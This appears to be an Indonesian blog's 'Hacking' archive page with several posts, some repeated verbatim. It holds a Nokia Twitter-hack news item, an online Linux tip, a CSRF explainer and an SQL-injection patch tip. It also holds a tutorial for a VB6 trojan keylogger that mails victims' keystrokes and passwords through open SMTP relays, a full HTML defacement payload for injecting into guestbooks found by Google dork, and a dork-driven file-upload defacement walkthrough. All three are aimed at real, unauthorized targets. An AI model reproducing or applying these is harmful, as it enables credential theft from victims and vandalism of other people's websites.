| ||
| Menurut yang dilaporkan
laman The Next Web, Jumat (29/11/2013), tweet tersebut sempat muncul
selama 13 menit di timeline akun @NokiaNZ. Namun setelah itu tweet yang
dapat menyinggung banyak follower Nokia tersebut menghilang. Kemungkinan
besar pihak Nokia telah menghapusnya.
Akun @NokiaNZ pun langsung mem-posting-kan sebuah tweet lain yang berisikan permohonan maaf kepada seluruh follower yang melihat tweet tak senonoh tersebut. Mereka menuliskan, "Hai semuanya, tidak seperti tweet terakhir tadi, kami mencintai semua fans Nokia. Maaf jika ada yang merasa terganggu, kami sedang menyelidikinya". Hingga kini belum ada penjelasan dari pihak Nokia terkait permasalah tweet kalimat kasar tersebut. Namun sejumlah rumor yang beredar di dunia maya menyebutkan bahwa besar kemungkinan akun Twitter Nokia New Zeland telah menjadi korban peretasan hacker. Akan tetapi tak sedikit pula yang mengira itu adalah perilaku usil karyawan Nokia sendiri. Sumber: Liputan6.com |
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Jumat, 29 November 2013
Ngetweet Kalimat kasar, Akun Twitter Nokia Diretas?
Jumat, 01 November 2013
Main Linux via Online
Pernahkan anda mencoba OS lain di dalam OS biasanya memakai VMware dll.
pastinya memakan memory yang cukup GEDE :v
kebayang gak ada VM online..??? ada kok ni jawabannya www.koding.com
di sini kamu bisa buat website dengan domain www.blablabl.ko.io ini domain gratisan yang disediakan oleh koding.com tapi juga bisa diganti kok dengan domainmu. Perlu di ingat koding.com mirip dengan server halayak server lokal, jadi misalkan ente On yang pasti server juga On alias alamat webmu pasti bisa di akses oleh semua orang tapi kalau kamu Off server juga Off ngerti kan maksudnya, yang gak ngerti EGP :v
*Anggap aja ente sudah daftar untuk mencoba Linux langsung pilih Develop kemudian pilih Terminal tunggu hingga loadiing dan koneksi berhasil.
Berikut SSnya
Kemudian Upload deh program Perl, Python, Ruby etc. yang sering maenan Linux pasti ngerti ya pastinya harus faham Commands Linux.
*Untuk Pembuatan website silakan Upload filemu di folder Web
*Install Mysql juga bisa langsung klik Develop pilih Get More App dan Pilih MySql Installer berikut SSnya
*Untuk Google Crome juga tersedia addon nya silakan klik link ini https://chrome.google.com/webstore/detail/terminal/kogcfmeennoidocadkgjhnbancebmlbf
Bagaimana tertarik kan, Tidak hanya itu disini kita bisa saling komunikasi dengan member-member lainya. Sebenarnya masih banyak lagi kegunaanya tapi keburu waktu mepet terpaksa ane post yang penting-penting doank, Oke semoga bermanfaat.
pastinya memakan memory yang cukup GEDE :v
kebayang gak ada VM online..??? ada kok ni jawabannya www.koding.com
di sini kamu bisa buat website dengan domain www.blablabl.ko.io ini domain gratisan yang disediakan oleh koding.com tapi juga bisa diganti kok dengan domainmu. Perlu di ingat koding.com mirip dengan server halayak server lokal, jadi misalkan ente On yang pasti server juga On alias alamat webmu pasti bisa di akses oleh semua orang tapi kalau kamu Off server juga Off ngerti kan maksudnya, yang gak ngerti EGP :v
*Anggap aja ente sudah daftar untuk mencoba Linux langsung pilih Develop kemudian pilih Terminal tunggu hingga loadiing dan koneksi berhasil.
Berikut SSnya
Kemudian Upload deh program Perl, Python, Ruby etc. yang sering maenan Linux pasti ngerti ya pastinya harus faham Commands Linux.
*Untuk Pembuatan website silakan Upload filemu di folder Web
*Install Mysql juga bisa langsung klik Develop pilih Get More App dan Pilih MySql Installer berikut SSnya
*Untuk Google Crome juga tersedia addon nya silakan klik link ini https://chrome.google.com/webstore/detail/terminal/kogcfmeennoidocadkgjhnbancebmlbf
Bagaimana tertarik kan, Tidak hanya itu disini kita bisa saling komunikasi dengan member-member lainya. Sebenarnya masih banyak lagi kegunaanya tapi keburu waktu mepet terpaksa ane post yang penting-penting doank, Oke semoga bermanfaat.
Lutfi rahman
Dunia,
Hacking,
Info,
Internet,
IT,
Pengetahuan,
Teknologi,
Tips dan Trik,
Tutorial
Sabtu, 02 Februari 2013
Vb 6.0 : Membuat Trojan Keylogger ( Hacking with Trojan )
Baik mari kita mulai merambah ke dunia pemrograman, untuk posting pertama tentang pemrograman ini saya akan memberikan panduan untuk membuat trojan keylogger, SOURCE CODE INI MASIH BUTUH PENGMBANGAN DAN SUDAH AUS DI MAKAN USIA, TAPIIIIIIII MASIH BERFUNGSI DENGAN BAIK KOK. CUMAN YA UDAH DI CIUMIN SAMA MBAK AVIRA AJA, KATANYA "AWAS TROJAAAAANNNN !!!" GITU CAIAAAAANNNNKKKKKKK.....
adapun hal-hal yang harus anda siapkan antara lain
PC dengan System Operasi Windows ( XP atau apa lah terserah yang penting masih men-support VB 6.0 )
Microsoft Visual Basic 6.0 ( kalo belum punya ya instal dulu lah dodolllll )
Pacul, Sabit, Krenjang dan Linggis ( Hoy Hoy nih bukan mau ngegarap sawah )
Tekad dan niat aja, ente ndak perlu pinter untuk bisa berkarya!!!!!!!!
Apa aja sih yang perlu anda pahami terlebih dahulu ????????
Pertama SMTP : atau sSimple Mail Transfer Protokol adalah sebuah jalur dalam jaringan network yang bertugas mengurusi segala bentuk pengiriman email, baik dari atau menuju server, dia menggunakan port 25, untuk mengetahui apakah SMTP dari sebuah jaringan open / tidak lakukan telnet server dengan cara
masuk ke cmd.exe dan ketikan perintah
Telnet [ip target] [25]
c:\>Telnet 192.898.098.23 25
biasanya kalau open ( mengizinkan pemakaian jalur tersebut untuk mengirimkan email tanpa password ) akan ada report jawaban "Hello" dan sejenisnya, coba2 sendiri lah saya lum ada waktu nyari contoh capture nya.
Kedua : Input yang di rekam oleh keylogger, pada dasarnnya Keylogger berarti .....
Key : Tombol , dalam hal ini tentu saja tombol keyboard
Log : adalah brankas penyimpanan berupa file berekstensi .txt atau .log
jadi keylogger adalah sebuah malware yang berfungsi merekam input yang di pencet oleh keyboard dan menyimpan hasil nya di sebuah file di tempat tersembunyi......kemudian suatu saat tertentu, file log tersebut akan di kirimkan ke email si pembuat via SMTP mail tadi lah,
Log file tersebut bisa berisi ketikan-ketikan huruf yang telah di input korban, kebanyakan pasti kata-kata yang ndak berguna, tapi bisa jadi suatu saat menyimpan password , karena waktu korban login ke apa kek , yahoo, facebook, atau login ke kamar mandi ( hayah ) dia pasti ngetik username dan password nya......bahaya banget kalo korban adalah seorang bisnis manager, pasti dia akan mengerjakan banyak data tentang perusahaan dan keuangan, termasuk PIN kartu kredit ( kali aja loh ndak jamin soalnya )
intinya SAYA BISA JADI HACKER ( nah lo, niat lu aja udah jelek kok, jangan lahhhh.....ini cuman belajar bro.....ndak boleh nakal ya ^_^ )
Setelah semua Di siapkan , buka Visual Basic 6.0 lalu buat 1 Project RUNDLL32 dengan isi sebagai berikut :
1. Satu buah form dengan komponen = 1 label, 3 text box, 2 buah timer, 1 buah SMTP ( nanti ada di user control )
3. Satu buah User Control dengan nama SMTP ( dengan satu komponen Winshock )
Kira-kira seperti ini lah model Project Explorer nya :
Nah jika udah selesai, tinggal memasukan kode aja deh, untuk lebih jelas silahkan download source code nya di sini : Keylogger Code
Di sana sudah saya berikan beberapa panduan dalam line komentar, moga aja ndak bingung, tapi intinya begitu lah, contoh :
Pada Form1
Di sana bagian paling vital adalah tempat anda meletakan SMTP Gratis Sekaligus Portnya, silahkan cari sendiri deh Free SMTP nya, punya saya udah kena Backlist. s1.go.ro dengan port 25 adalah SMTP dari tutorial awal, saya ndak kasih perubahan apa2, yang jelas itu udah ndak bisa di pake.
Modul itu berfungsi untuk melakukan chek pada internet connection di komputer korban, jadi gunanya adalah melakukan testing pada sambungan akses, ia mengirimkan request koneksi ke www.google.com
Pada Module 1
Di sana terdapat banyak kode yang berfungsi untuk menangkap input dari keyboard, yah namanya juga keylogger, udah saya jelaskan definisinya di atas situ..... semua yang di tekan keyboard akan terekam di logs file nya, lalu di kirim ke email tujuan ( milik pembuat keylog ) melalui SMTP gratis yang masih Open. ( sebenarnya bisa menggunakan SMTP berpassword seperti milik gmail, tapi bahayanya, kalau keylogger buatan ente berhasil di crack oleh hacker, maka password anda akan ketauan n keylog ini bisa jadi pagar makan tanaman atau senjata makan tuan, makanya kita menggunakan free SMTP yang ndak berpassword )
Pada User Control SMTP
Wes lah, pada dasarnya user control adalah komponen tambahan dari VB 6.0 yang masih berbentuk kode mentah, (yang mateng pasti berekstensi .ocx atau .dll ) inilah yang membuat keylog bisa di buat secara portabel tanpa melakukan package terlebih dahulu. pada user control ini kita akan melihat banyak sekali kode yag berfungsi untuk mengatur sambungan ke server mail, misalkan apa saja yang akan di kirimkan, apa saja alat pengirimanya, dan data mana yang harus di ambil untuk di transfer ke email. intinya gitu lah.
Udah ya, capek ngetik mulu, download aja kode keylogger nya di sini. yang perlu anda edit hanyalah bagian alamat SMTP gratis, Port yang di gunakan, serta alamat email tujuan pengiriman data.
selamat mencuri data penting orang lain ya dan selamat di penjara kalau ketahuan hahahahaha
Weleh nih SC di credit kan pada :
1. whinshock.com ( dak tau salah pa bener tuh domainya )
2. jasakom
3. X-code forum
4. Joex Securityonline
Minggu, 06 Januari 2013
Apa itu CSRF (Cross-site Request Forgery)
CSRF (Cross-site Request Forgery) merupakan suatu teknik hacking
untuk mendapatkan atau bahkan menguasai suatu account dengan cara
menyerang web yang dieksekusi atas wewenang korban, tanpa
dikehendakinya.
CSRF merupakan teknik pemalsuan permintaan yang berasal dari halaman web atau situs yang berbeda, saat halaman situs dieksekusi oleh korban maka akan muncul account baru yang tanpa dikehendaki si admin.
Celah keamanan banyak di temukan di berbagai CMS, contohnya CMS VCalendar.
Penulis buat sebuah cerita agar mudah di mengerti, ada seorang admin memiliki situs yang dibangun dengan VCalendar, suatu saat dia login ke halaman administrator.
Setelah si admin login dan masuk ke menu pilihan user maka akan tampil para user di situs tersebut.
Terlihat ada 3 buah account, pada saat itu juga diminta oleh seseorang temannya untuk membuka suatu halaman situs.
Saat admin melakukan klik tiba-tiba muncul halaman daftar user untuk login.
Dengan ditambahnya user secara otomatis ke halaman administrator, maka temannya si admin yang menjebak dapat melakukan login dengan account tersebut.
CSRF merupakan teknik pemalsuan permintaan yang berasal dari halaman web atau situs yang berbeda, saat halaman situs dieksekusi oleh korban maka akan muncul account baru yang tanpa dikehendaki si admin.
Celah keamanan banyak di temukan di berbagai CMS, contohnya CMS VCalendar.
Penulis buat sebuah cerita agar mudah di mengerti, ada seorang admin memiliki situs yang dibangun dengan VCalendar, suatu saat dia login ke halaman administrator.
Setelah si admin login dan masuk ke menu pilihan user maka akan tampil para user di situs tersebut.
Terlihat ada 3 buah account, pada saat itu juga diminta oleh seseorang temannya untuk membuka suatu halaman situs.
Saat admin melakukan klik tiba-tiba muncul halaman daftar user untuk login.
Dengan ditambahnya user secara otomatis ke halaman administrator, maka temannya si admin yang menjebak dapat melakukan login dengan account tersebut.
Sabtu, 11 Agustus 2012
Hack Buku Tamu
berikut langkahnya:
1. Dork inurl:guesbook.php <<<< terserah anda di edit model gimana :D
2. pilih salah satu target dan saya mencoba target berikut gambarnya maaf saya tidak menyertakan link atau alamat target dengan alasan Privacy.
3. Isikan data diri yang pasti data diri palsu yaaaa terserah anda lah.
4. di kolom "Pesan" isikan script yang sudah saya edit agar tampilan tidak seperti di screenshoot yang saya pampang. berikut scriptnya di bawah ini :
</DIV><DIV align=left><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><center><br><img border="0" src="http://3.bp.blogspot.com/-QNG-ymQX7DE/T_jFaeh2TDI/AAAAAAAAOko/Y6KFEyXC_CE/s400/Hacker.jpg" width="473" height="253"><br><br><br><font face="Arial" color="#339999" size="6"><strong>1nd0n3s14 H4ck3r</strong></font><br><br><embed src="http://www.selbys.com/images/shotgun.swf" width="191" height="252"></embed><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Special Thank's<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">kosong8<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Dedicated All Crew<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Surabayahacker - Balikita - Cyber AE - All Indonesia Hacker<br><br><br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Hey admin......do you a need help ?<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Dont Panic</font><br><br><br><strong><font face="Arial" size="6" color="#339999"><marquee width="30%">I Love Your Site !!! </marquee></font></strong></DIV></DIV>
4. Kirim/Submit pokonya apa aja tombol pengirim di bukut tamu tersebut :D dan SELESAI lihat hasilnya
PERINGATAN:TUTORIAL INI BUKAN UNTUK DI SALAH GUNAKAN, JIKA ADA RESIKO YANG MENANGGUNG ANDA DALAM MENYALAH GUNAKAN TUTORIAL INI, PENUSLIS TIDAK BERTANGGUNG JAWAB.
COPAS: HARAP IZIN DAN MEMBERIKAN CREDIT ATAU SEMACAMNYA
Lutfi rahman
Hacking
Selasa, 17 Juli 2012
Cara Mengindari SQL Injection dengan Patch Bug
jika kamu adalah seorang admin,webmaster di suatu website . . .
pasti kamu ingin menangkalserangan ini…ane akan beri sedikit trick untuk menangkal Sql Injection
sebaiknya,sebelum kamu meng-upload situs anda, uji coba dulu keamanan na menggunakan tools seperti N-stealth keamanan scanner, Acuenetix Ltd’ s web Vulnerability scanner, Jsky Vuln Scaner dan SPi Dynamics Weblnspect
untuk versi gratis,bisa menggunakan Nikto
untuk Jsky Vuln Scaner
software diatas bisa di cari dipasar ( google )
ok lanjutt
jika udah di coba menggunakan software diatas, dan ketemu bug ,cari dimana letak nya, misalnya Url ini
Http://Yoursite/index.php?id=9
apabila ane tambahkan petik ‘ , terlihat error SQL .berarti bug na terletak di bagian index.php
sekarang coba lu download dulu script berikut ini :
http://www.ziddu.com/download/15763432/scriptpachtsql.txt.html
simpan file dengan nama patch.php , Etss Jangan Lupa , Tulisan Yg Berwarna Merah Ituh Diganti Dengan URL YANG KAMU INGINKAN ..
dan jangan lupa simpan file itu dengan 1 folder index.php ( ga tau kenapa )
jika sudah , lu dapat membuka file index.php dan menambahkan :
include'patch.php;
inti dari perintah di atas adlh ketika lu mengakses Http://Yoursite/index.php?id=9 dan menambahkan syntax (*‘ ) na, maka otomatis akan di alihkan ke URL YANG ELU MASUKIN TADI ( bole juga ke jebakan betmen, biar kapok tu orang )
mungkin code diatas sangat sederhana.
tetapi sangat membantu untuk melakukan patch pada bug SQL
tutorial diatas saya tulis pakai tangan sendiri
makasi
Sumber : http://infokawan.com/2011/07/cara-mengindari-sql-injection-dengan-patch-bug/
Lutfi rahman
Hacking
Cara Mengindari SQL Injection dengan Patch Bug
jika kamu adalah seorang admin,webmaster di suatu website . . .
pasti kamu ingin menangkalserangan ini…ane akan beri sedikit trick untuk menangkal Sql Injection
sebaiknya,sebelum kamu meng-upload situs anda, uji coba dulu keamanan na menggunakan tools seperti N-stealth keamanan scanner, Acuenetix Ltd’ s web Vulnerability scanner, Jsky Vuln Scaner dan SPi Dynamics Weblnspect
untuk versi gratis,bisa menggunakan Nikto
untuk Jsky Vuln Scaner
software diatas bisa di cari dipasar ( google )
ok lanjutt
jika udah di coba menggunakan software diatas, dan ketemu bug ,cari dimana letak nya, misalnya Url ini
Http://Yoursite/index.php?id=9
apabila ane tambahkan petik ‘ , terlihat error SQL .berarti bug na terletak di bagian index.php
sekarang coba lu download dulu script berikut ini :
http://www.ziddu.com/download/15763432/scriptpachtsql.txt.html
simpan file dengan nama patch.php , Etss Jangan Lupa , Tulisan Yg Berwarna Merah Ituh Diganti Dengan URL YANG KAMU INGINKAN ..
dan jangan lupa simpan file itu dengan 1 folder index.php ( ga tau kenapa )
jika sudah , lu dapat membuka file index.php dan menambahkan :
include'patch.php;
inti dari perintah di atas adlh ketika lu mengakses Http://Yoursite/index.php?id=9 dan menambahkan syntax (*‘ ) na, maka otomatis akan di alihkan ke URL YANG ELU MASUKIN TADI ( bole juga ke jebakan betmen, biar kapok tu orang )
mungkin code diatas sangat sederhana.
tetapi sangat membantu untuk melakukan patch pada bug SQL
tutorial diatas saya tulis pakai tangan sendiri
makasi
Sumber : http://infokawan.com/2011/07/cara-mengindari-sql-injection-dengan-patch-bug/
Lutfi rahman
Hacking
Deface Mudah aLa CUPU
Assalamualaikum,,
sebeLum nya apa kabar Semuah,,,udah lama gak On Line,,dan Akhir nya saya buat TutoriaL ini..!!
kaLi ini saya mau kasih TutoriaL Deface Web aLa CUPU,,simpLe dan aktraktis Bro..
dan sebenarnya tutorial ini sudah lama sekali dan bagi para master harap out dari artikel ini :D
okeh Langsung ajah Ya:
1. Pertama buka google.com
2. ketikan atau copas aja dork di bawah ini :
inurl:examples/uploadbutton.html
3. klik enter, pilih salah satu situs yang ada
4. klik tulisan Upload
5. UpLoad fiLe html deface anda,,,
6. ntar muncul tulisan di kotak yang persegi panjang ( trus Copy )
7. lalu ( Paste ) pastekan di belakang alamat situs tersebut misalkan
www.target.com/examples/uploadbutton.html Jadi www.target.com/kata yang ada di dalam kotak persegi panjang tadi
Okeh Sekian duLu Ya and Happy Defacing,,,
Lutfi rahman
Hacking
Langganan:
Postingan (Atom)
